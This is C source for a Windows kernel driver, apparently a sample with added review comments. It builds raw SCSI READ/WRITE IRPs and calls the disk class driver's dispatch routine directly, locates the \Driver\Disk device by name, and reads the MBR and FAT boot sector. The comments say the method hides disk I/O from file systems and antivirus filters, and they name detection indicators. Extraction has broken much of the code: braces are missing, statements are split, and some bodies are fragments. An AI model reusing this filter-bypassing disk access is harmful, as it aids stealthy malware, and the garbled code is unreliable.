{
UCHARactive;
UCHARStartHead;
UCHARStartSector;
UCHARStartCylinder;
UCHARPartitionType;
UCHAREndHead;
UCHAREndSector;
UCHAREndCylinder;
ULONGStartLBA;
ULONGTotalSector;
}PARTITION_ENTRY,*PPARTITION_ENTRY;
// Master Boot Record as read from LBA 0 by GetPosAndCluster: 446 bytes of
// boot code, four PARTITION_ENTRY slots (declared just above), then the
// two-byte signature. With the pack(1) that the trailing #pragma pack()
// closes, the visible field sizes add up to one 512-byte sector
// (446 + 4*16 + 2).
// Extraction damage: the opening "{" after the typedef line is missing
// (the matching "}" survived).
typedefstruct_MBR_SECTOR
UCHARBootCode[446];
PARTITION_ENTRYPartition[4];
USHORTSignature;
}MBR_SECTOR,*PMBR_SECTOR;
// First sector of a partition (boot sector). The field order and names
// (JmpCode/NopCode, OEMName, BytesPerSector ... SectorsPerFAT16, ...,
// SectorsPerFAT32) follow the FAT BIOS Parameter Block; only the prefix up
// to SectorsPerFAT32 is modelled. GetPosAndCluster reads SectorsPerCluster,
// ReservedSectors and NumberOfFATs from this view to locate the partition's
// data area.
// Extraction damage: the opening "{" after the typedef line is missing.
typedefstruct_BBR_SECTOR
USHORTJmpCode;
UCHARNopCode;
UCHAROEMName[8];
USHORTBytesPerSector;
UCHARSectorsPerCluster;
USHORTReservedSectors;
UCHARNumberOfFATs;
USHORTRootEntries;
USHORTNumberOfSectors16;
UCHARMediaDescriptor;
USHORTSectorsPerFAT16;
USHORTSectorsPerTrack;
USHORTHeadsPerCylinder;
ULONGHiddenSectors;
ULONGNumberOfSectors32;
ULONGSectorsPerFAT32;
}BBR_SECTOR,*PBBR_SECTOR;
#pragmapack()
// One entry of the undocumented SystemModuleInformation (class 11) array
// returned by ZwQuerySystemInformation; GetModuleBase walks these to find a
// loaded kernel module by name. ImageName is a fixed 255-byte buffer and
// ModuleNameOffset is the offset inside it that GetModuleBase treats as the
// start of the bare file name. Field names other than Base/Size/ImageName
// are the author's guesses (note "Unknown").
typedefstruct_SYSTEM_MODULE_INFORMATION{
ULONGReserved[2];
PVOIDBase;
ULONGSize;
ULONGFlags;
USHORTIndex;
USHORTUnknown;
USHORTLoadCount;
USHORTModuleNameOffset;
CHARImageName[255];
}SYSTEM_MODULE_INFORMATION,*PSYSTEM_MODULE_INFORMATION;
// Hand-written prototype for ObReferenceObjectByName (exported by the
// kernel but absent from the public headers). GetAtaDr0DevObject uses it
// to look up "\Driver\Disk" by name and walk that driver's device list.
// NOTE(review): resolving the disk class driver object by name instead of
// opening a volume or \\.\PhysicalDriveN handle sidesteps handle-based
// access checks; an import of this routine from a third-party driver is a
// reasonable hunting indicator.
NTSYSAPI
NTSTATUS
NTAPI
ObReferenceObjectByName(
INPUNICODE_STRINGObjectName,
INULONGAttributes,
INPACCESS_STATEAccessStateOPTIONAL,
INACCESS_MASKDesiredAccessOPTIONAL,
INPOBJECT_TYPEObjectType,
INKPROCESSOR_MODEAccessMode,
INOUTPVOIDParseContextOPTIONAL,
OUTPVOID*Object);
// Prototype for ZwQuerySystemInformation, called with class 11
// (SystemModuleInformation) by GetModuleBase. The linkage/return-type
// lines that precede the name were lost in extraction.
ZwQuerySystemInformation(
INULONGSystemInformationClass,
INOUTPVOIDSystemInformation,
INULONGSystemInformationLength,
OUTPULONGReturnLength);
// Completion routine for the hand-built IRPs used by this sample.
// Copies the IRP's final Status/Information into the caller's
// IO_STATUS_BLOCK (Irp->UserIosb), unlocks and frees the MDL when the
// routine was installed without a Context, signals the caller's event
// (Irp->UserEvent) and frees the IRP itself. It returns
// STATUS_MORE_PROCESSING_REQUIRED, presumably so the I/O manager does not
// continue completing an IRP this routine has already freed.
// Extraction damage: the return type before the name, the
// "Irp->UserIosb->" prefix on the Information assignment, and the comma
// between the DbgPrint format string and its argument are missing.
IrpCompletionRoutine(
INPDEVICE_OBJECTDeviceObject,
INPIRPIrp,
INPVOIDContext
){
PMDLmdl;
// Propagate completion status to the synchronous caller's status block.
Irp->
UserIosb->
Status=Irp->
IoStatus.Status;
Information=Irp->
IoStatus.Information;
// No Context => this instance owns the MDL and must tear it down.
if(!
Context)
{
mdl=Irp->
MdlAddress;
if(mdl){
DbgPrint("
readsize:
%d.."
Irp->
IoStatus.Information);
MmUnlockPages(mdl);
IoFreeMdl(mdl);
}}
// Wake the thread blocked in KeWaitForSingleObject, then release the IRP.
KeSetEvent(Irp->
UserEvent,IO_NO_INCREMENT,0);
IoFreeIrp(Irp);
returnSTATUS_MORE_PROCESSING_REQUIRED;
}
// Second completion routine; AtapiReadWriteDisk installs this one with the
// SRB as Context. Only fragments survived extraction (the if(!Context) and
// if(mdl) tests and the final return), so its body cannot be verified from
// this text; the surviving lines mirror IrpCompletionRoutine above.
// NOTE(review): whether this routine frees the SRB/sense buffer passed as
// Context cannot be confirmed here — see the leak note in AtapiReadWriteDisk.
NTSTATUSIrpCompletionRoutine_0(
if(!
Context)
if(mdl)
}
returnSTATUS_MORE_PROCESSING_REQUIRED;
// Returns the load base of the first loaded kernel module whose file name
// matches `name` (case-insensitive, compared over strlen(name) characters,
// so effectively a prefix match), or 0 when none matches.
// Queries SystemModuleInformation (class 11) twice: once with a zero-length
// buffer (&n doubles as the ReturnLength output) to learn the required size,
// then into a NonPagedPool buffer laid out as a ULONG count followed by the
// SYSTEM_MODULE_INFORMATION array.
// NOTE(review): locating a kernel module's base this way is typically a
// prelude to patching or hooking that module — a detection-relevant call
// pattern. The ExAllocatePool result is used without a NULL check, and the
// strcpy into the 255-byte `modulename` relies on ImageName being
// NUL-terminated within its 255 bytes.
// Extraction damage: the "if(!" before _strnicmp, the "[i]" index on
// `module`, and the loop/function closing braces are missing.
ULONGGetModuleBase(char*name){
ULONGn,i;
PSYSTEM_MODULE_INFORMATIONmodule;
PVOIDpbuftmp;
charmodulename[255];
// First call: size probe only.
ZwQuerySystemInformation(11,&
n,0,&
n);
pbuftmp=ExAllocatePool(NonPagedPool,n);
// Second call: fill the buffer; entries start after the leading count.
ZwQuerySystemInformation(11,pbuftmp,n,NULL);
module=(PSYSTEM_MODULE_INFORMATION)((PULONG)pbuftmp+1);
n=*((PULONG)pbuftmp);
for(i=0;
i<
n;
i++)
strcpy(modulename,module.ImageName+module.ModuleNameOffset);
_strnicmp(modulename,name,strlen(name))){
ExFreePool(pbuftmp);
return(ULONG)module.Base;
ExFreePool(pbuftmp);
return0;
// Private re-implementation of IoCallDriver: steps to the next IRP stack
// location, records the target device in it, and invokes the target driver's
// dispatch routine for that location's MajorFunction directly.
// NOTE(review): because the exported IoCallDriver is never called, any hook
// placed on that export — and the checks it performs — is bypassed; the
// direct DriverObject->MajorFunction[] call is a useful detection signature.
// Extraction damage: the "Irp->" prefix on the
// Tail.Overlay.CurrentStackLocation assignment and the function braces are
// missing.
NTSTATUSMyIoCallDriver(PDEVICE_OBJECTDeviceObject,PIRPIrp)// our own IoCallDriver
PIO_STACK_LOCATIONstack;
// Move one stack location down, exactly as IoCallDriver does.
--Irp->
CurrentLocation;
stack=IoGetNextIrpStackLocation(Irp);
Tail.Overlay.CurrentStackLocation=stack;
// advance the stack
stack->
DeviceObject=DeviceObject;
// Dispatch directly into the driver's major-function table.
return(DeviceObject->
DriverObject->
MajorFunction[(ULONG)stack->
MajorFunction])(DeviceObject,Irp);
// Reads or writes `BlockCount` 512-byte sectors starting at LBA `DiskPos`
// on the disk device `dev_object` by hand-building a SCSI_REQUEST_BLOCK
// with a 10-byte READ/WRITE CDB and sending it as IRP_MJ_SCSI through
// MyIoCallDriver. `MajorFunction` selects the direction: IRP_MJ_READ means
// data-in, anything else data-out. `buffer` is locked with an MDL and
// released by the completion routine.
// Returns the IRP status once it is >= 0 or the 8 retries are exhausted
// (1 us stall between attempts), or STATUS_INSUFFICIENT_RESOURCES when an
// allocation fails.
// SECURITY NOTE(review): this is the core technique of the sample — the
// request enters the disk class driver's dispatch directly, so the file
// system, volume manager and every filter attached above the disk class
// device (file-system minifilters, AV/audit drivers) never see the I/O.
// Hunting for IRP_MJ_SCSI IRPs originating from a non-storage driver, or
// for this call pattern, is the defensive counterpart.
// NOTE(review): in the visible code neither `srb` nor the sense buffer
// allocated here (`psense`) is freed on the success path; only a sense
// buffer that the lower driver substituted is freed. They may be released
// in IrpCompletionRoutine_0 (Context = srb), whose body did not survive
// extraction. QueueAction is assigned an SRB_FLAGS_ value, which looks like
// a copy/paste slip.
// Extraction damage: the "if(!srb)" / "if(!sense)" / "if(!mdl)" heads, the
// "srb->" / "irp->" prefixes on the field assignments, the `mdl` local
// declaration, the opening braces and the DbgPrint before "SendXXXFailed"
// are missing or split across lines.
ULONGAtapiReadWriteDisk(PDEVICE_OBJECTdev_object,ULONGMajorFunction,PVOIDbuffer,ULONGDiskPos,intBlockCount)
NTSTATUSstatus;
PSCSI_REQUEST_BLOCKsrb;
PSENSE_DATAsense;
KEVENTEvent;
PIRPirp;
IO_STATUS_BLOCKisb;
PIO_STACK_LOCATIONisl;
PVOIDpsense;
intcount=8;
// Retry loop; `count` is decremented after each failed attempt.
while
(1){
srb=ExAllocatePool(0,sizeof(SCSI_REQUEST_BLOCK));
srb)
break;
sense=ExAllocatePool(0,sizeof(SENSE_DATA));
psense=sense;
sense)
memset(srb,0,sizeof(SCSI_REQUEST_BLOCK));
memset(sense,0,sizeof(SENSE_DATA));
srb->
Length=sizeof(SCSI_REQUEST_BLOCK);
// For more on the SRB see "SCSI Bus and IDE Interface: Protocols,
// Applications and Programming" and "The SCSI Programmer's Guide".
Function=0;
DataBuffer=buffer;
DataTransferLength=BlockCount<
<
9;
// sector size (512) * number of sectors
QueueAction=SRB_FLAGS_DISABLE_AUTOSENSE;
SrbStatus=0;
ScsiStatus=0;
NextSrb=0;
SenseInfoBuffer=sense;
SenseInfoBufferLength=sizeof(SENSE_DATA);
// Direction flag from the requested major function.
if(MajorFunction==IRP_MJ_READ)
SrbFlags=SRB_FLAGS_DATA_IN;
else
SrbFlags=SRB_FLAGS_DATA_OUT;
SrbFlags|=SRB_FLAGS_ADAPTER_CACHE_ENABLE;
SrbFlags|=SRB_FLAGS_DISABLE_AUTOSENSE;
// Timeout scales with transfer size: (bytes >> 10) + 1.
TimeOutValue=(srb->
DataTransferLength>
>
10)+1;
QueueSortKey=DiskPos;
CdbLength=10;
// Opcode: with the DDK values IRP_MJ_READ=3 and IRP_MJ_WRITE=4 this
// yields 2*(3+17)=0x28 (READ(10)) and 2*(4+17)=0x2A (WRITE(10)).
Cdb[0]=2*((UCHAR)MajorFunction+17);
// Byte 1: keep the low 5 bits, set bit 7.
Cdb[1]=srb->
Cdb[1]&
0x1F|0x80;
// Bytes 2..5: logical block address, big-endian.
Cdb[2]=(unsignedchar)(DiskPos>
0x18)&
0xFF;
//
Cdb[3]=(unsignedchar)(DiskPos>
0x10)&
Cdb[4]=(unsignedchar)(DiskPos>
0x08)&
Cdb[5]=(UCHAR)DiskPos;
// fill in the sector position
// Bytes 7..8: transfer length in blocks, big-endian.
// NOTE(review): as extracted, the (UCHAR) cast binds before the shift,
// so byte 7 would always be 0 and counts above 255 would be truncated —
// confirm against the original text.
Cdb[7]=(UCHAR)BlockCount>
0x08;
Cdb[8]=(UCHAR)BlockCount;
// By:
// Eros412
// Build the IRP by hand: synchronous, kernel-mode, with an MDL over
// `buffer` so the port driver can DMA directly into/out of it.
KeInitializeEvent(&
Event,0,0);
irp=IoAllocateIrp(dev_object->
StackSize,0);
mdl=IoAllocateMdl(buffer,BlockCount<
9,0,0,irp);
irp->
MdlAddress=mdl;
mdl){
ExFreePool(srb);
ExFreePool(psense);
IoFreeIrp(irp);
returnSTATUS_INSUFFICIENT_RESOURCES;
// Lock the pages; AccessMode 0 (kernel), operation 0 for a read and 1
// otherwise.
MmProbeAndLockPages(mdl,0,(MajorFunction==IRP_MJ_READ?
0:
1));
OriginalRequest=irp;
UserIosb=&
isb;
UserEvent=&
Event;
IoStatus.Status=0;
IoStatus.Information=0;
Flags=IRP_SYNCHRONOUS_API|IRP_NOCACHE;
AssociatedIrp.SystemBuffer=0;
Cancel=0;
RequestorMode=0;
CancelRoutine=0;
Tail.Overlay.Thread=PsGetCurrentThread();
// Next stack location: IRP_MJ_SCSI carrying the SRB, completion routine
// receives the SRB as Context and runs on success, error and cancel.
isl=IoGetNextIrpStackLocation(irp);
isl->
DeviceObject=dev_object;
MajorFunction=IRP_MJ_SCSI;
Parameters.Scsi.Srb=srb;
CompletionRoutine=IrpCompletionRoutine_0;
Context=srb;
Control=SL_INVOKE_ON_CANCEL|SL_INVOKE_ON_SUCCESS|SL_INVOKE_ON_ERROR;
// Dispatch directly into the disk class driver and wait for completion.
status=MyIoCallDriver(dev_object,irp);
KeWaitForSingleObject(&
Event,0,0,0,0);
// Free a sense buffer only if the lower driver swapped ours out.
if(srb->
SenseInfoBuffer!
=psense&
&
srb->
SenseInfoBuffer)
ExFreePool(srb->
SenseInfoBuffer);
// Success, or out of retries: hand the status back as-is.
if(status>
=0||!
count)
returnstatus;
SendXXXFailed..%08x\r\n"
status);
KeStallExecutionProcessor(1u);
--count;
// Reached only via `break` when an allocation failed.
returnSTATUS_INSUFFICIENT_RESOURCES;
/*
 * Walk the device list hanging off `drv_object` (the disk class driver) and
 * return the last device whose DeviceType is FILE_DEVICE_DISK, or NULL when
 * the list holds none. The original author's comment calls the result DR0;
 * presumably that relies on the device list being prepended as devices are
 * created, which is not verified here.
 */
PDEVICE_OBJECT GetLastDiskDeviceObject(PDRIVER_OBJECT drv_object) // this is DR0
{
    PDEVICE_OBJECT last_disk = NULL;
    PDEVICE_OBJECT cur;

    for (cur = drv_object->DeviceObject; cur != NULL; cur = cur->NextDevice) {
        if (cur->DeviceType != FILE_DEVICE_DISK)
            continue;
        last_disk = cur;   /* keep overwriting: the last match wins */
    }
    return last_disk;
}
// Resolves the disk class driver object "\Driver\Disk" by name (attributes
// 64 = OBJ_CASE_INSENSITIVE, type *IoDriverObjectType) and returns the device
// GetLastDiskDeviceObject picks from its device list, i.e. what the sample
// treats as DR0. Returns NULL when the lookup fails (status < 0).
// The driver object reference is dropped before returning; the returned
// device pointer carries no reference of its own.
// NOTE(review): going through ObReferenceObjectByName rather than opening
// \\.\PhysicalDrive0 presumably avoids handle-based access checks and any
// upper filters; this lookup is a good detection point for the technique.
// Extraction damage: the comma between the DbgPrint format string and its
// argument, and the function braces, are missing.
PDEVICE_OBJECTGetAtaDr0DevObject(){
UNICODE_STRINGdiskstr;
PDRIVER_OBJECTdiskdrv;
PDEVICE_OBJECTdr0dev;
RtlInitUnicodeString(&
diskstr,L"
\\Driver\\Disk"
);
// Negative NTSTATUS = failure.
if(ObReferenceObjectByName(&
diskstr,64,0,0,*IoDriverObjectType,0,0,&
diskdrv)<
0)
returnNULL;
dr0dev=GetLastDiskDeviceObject(diskdrv);
if(dr0dev)
DbgPrint("
Eros412said:
atadr0devobjis:
%08x..."
dr0dev);
// Release the driver reference taken above; dr0dev is returned unreferenced.
ObfDereferenceObject(diskdrv);
returndr0dev;
// Resolves the device object backing a file object. From the surviving
// fragments it appears to prefer the device recorded in the file object's
// VPB (volume parameter block) and to fall back to Object->DeviceObject (or
// its VPB's device) when the VPB or its DeviceObject is absent; the exact
// fallback order cannot be confirmed from this text.
// NOTE(review): as the lines stand, `vpb->` is dereferenced before the
// "!vpb" test — whether that is the original order or an artefact of the
// extraction cannot be determined here.
// Extraction damage: the member after "result=vpb->", the "if(!" heads and
// several "->" chains are missing.
PDEVICE_OBJECTGetFileObjectDevice(PFILE_OBJECTObject){
PDEVICE_OBJECTresult=NULL;
PVPBvpb;
vpb=Object->
Vpb;
result=vpb->
vpb||!
result)
Object->
DeviceObject->
Vpb||!
Vpb->
DeviceObject)
result=Object->
returnresult;
PLARGE_INTEGERGetPosAndCluster()//得到第一个分区文件数据的起始位置
PVOIDbuffer;
ULONGtype,startlba;
inti;
PLARGE_INTEGERresult;
PDEVICE_OBJECTdev;
PMBR_SECTORmbrsec;
PPARTITION_ENTRYpartition0;
PBBR_SECTORbootsec;
result=ExAllocatePool(0,sizeof(LARGE_INTEGER));
dev=GetAtaDr0DevObject();
if(dev){
buffer=ExAllocatePool(0,512);
memset(buffer,0,512);
if(AtapiReadWriteDisk(dev,IRP_MJ_READ,buffer,0,1)>
AtapiReadWriteDiskok"
mbrsec=(PMBR_SECTOR)buffer;
partition0=&
mbrsec->
Partition[0];
startlba=partition0[0].StartLBA;
type=partition0[0].PartitionType;
dwPartOnePos:
0x%08x..1"
startlba);
result->
QuadPart=startlba;
if(AtapiReadWriteDisk(dev,IRP_MJ_READ,buffer,startlba,1)>
0){
bootsec=(PBBR_SECTOR)buffer;
gSectorsPerCluster:
%d..."
bootsec->
SectorsPerCluster);
sectorspercluster=bootsec->
SectorsPerCluster;
QuadPart+=bootsec->
ReservedSectors;
%I64x..2\r\n"
result->
QuadPart);
if(type==PARTITION_TYPE_FAT32||type==PARTITION_TYPE_FAT32_LBA)
NumberOfFATs*bootsec->
SectorsPerFA